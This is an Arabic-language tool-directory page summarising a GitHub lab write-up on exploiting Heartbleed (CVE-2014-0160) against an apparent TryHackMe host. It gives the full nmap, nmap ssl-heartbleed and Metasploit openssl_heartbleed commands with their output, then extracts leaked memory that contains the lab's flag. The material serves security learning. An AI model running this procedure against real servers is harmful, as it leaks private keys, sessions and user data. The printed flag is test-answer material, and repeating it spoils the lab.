Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/artemcyberlab/project-field-analysis-and-memory-leak-demonstration
تحليل الذاكرة الجنائيتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubartemcyberlab/project-field-analysis-and-memory-leak-demonstration

Project-Field-Analysis-and-Memory-Leak-Demonstration

كان الهدف من هذا المشروع هو تقييم مضيف بعيد لثغرة Heartbleed (CVE-2014-0160)، والتحقق من وجودها، واستغلالها لاستخراج معلومات قد تكون حساسة من ذاكرة الخادم عبر بروتوكول TLS.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
6منذ سنة واحدةلم تتم المراجعة بعد

الهدف

كان الهدف من هذا المشروع هو تقييم مضيف بعيد بحثًا عن ثغرة Heartbleed (CVE-2014-0160)، والتحقق من وجودها، واستغلالها لاستخراج معلومات قد تكون حساسة من ذاكرة الخادم عبر بروتوكول TLS.

التنفيذ

  1. تحديد الخدمات المفتوحة (Nmap) nmap -sC -sV 52.215.184.158 النتيجة:
root@kitploit:~
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.4
111/tcp open  rpcbind  2-4
443/tcp open  ssl/http nginx 1.15.7

| ssl-cert: Subject: CN=localhost/O=TryHackMe/ST=London/C=UK
| Not valid before: 2019-02-16T10:41:14
| Not valid after:  2020-02-16T10:41:14

شهادة TLS كانت موقعة ذاتيًا ومنتهية الصلاحية. أثار ذلك شكوكًا بأن إصدار OpenSSL قد يكون قديمًا. المنفذ المستهدف: 443.

  1. فحص ثغرة Heartbleed (برنامج Nmap النصي) nmap -p 443 --script ssl-heartbleed 52.215.184.158 النتيجة:
root@kitploit:~
| ssl-heartbleed:
|   VULNERABLE:
|     OpenSSL 1.0.1 is vulnerable to Heartbleed
|     State: VULNERABLE
|     Risk factor: High
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160

تم تأكيد أن الهدف معرض لثغرة Heartbleed.

  1. الاستغلال (إطار Metasploit) msfconsole use auxiliary/scanner/ssl/openssl_heartbleed set RHOSTS 52.215.184.158 run النتيجة:
root@kitploit:~
[+] Heartbeat response with leak, 44883 bytes
[+] Heartbeat data stored in /root/.msf4/loot/20250627224930_default_52.215.184.158_openssl.heartble_152689.bin

تم تفريغ الذاكرة بنجاح وتخزينها محليًا للتحليل.

  1. تحليل تفريغ الذاكرة
root@kitploit:~
strings openssl.heartble_152689.bin | grep -i "THM{"

النتيجة:

root@kitploit:~
user_name=hacker101&[email protected]&user_message=THM{sSl-Is-BaD}

تم استخراج بيانات سرية، بما في ذلك علم التطبيق (flag)، بنجاح من ذاكرة TLS — مما يؤكد أنه يمكن استغلال الثغرة عمليًا لتسريب معلومات حساسة.

الخلاصة

لقد تمكنت بنجاح من تحديد واستغلال CVE-2014-0160 على خادم بعيد. تضمنت العملية:

  • كشف الثغرة باستخدام nmap
  • استغلال العيب باستخدام Metasploit
  • استخراج بيانات المستخدم المقدمة مباشرة (بما في ذلك العلم THM{sSl-Is-BaD}) من الذاكرة

التأثير التجاري

يشكل وجود Heartbleed في نظام معرض للجمهور خطرًا حرجًا:

  • احتمال تسرب المفاتيح الخاصة لـ TLS
  • اختطاف الجلسات
  • كشف أسماء المستخدمين، والبريد الإلكتروني، والإدخالات الحساسة للمستخدم
تنزيل الأداة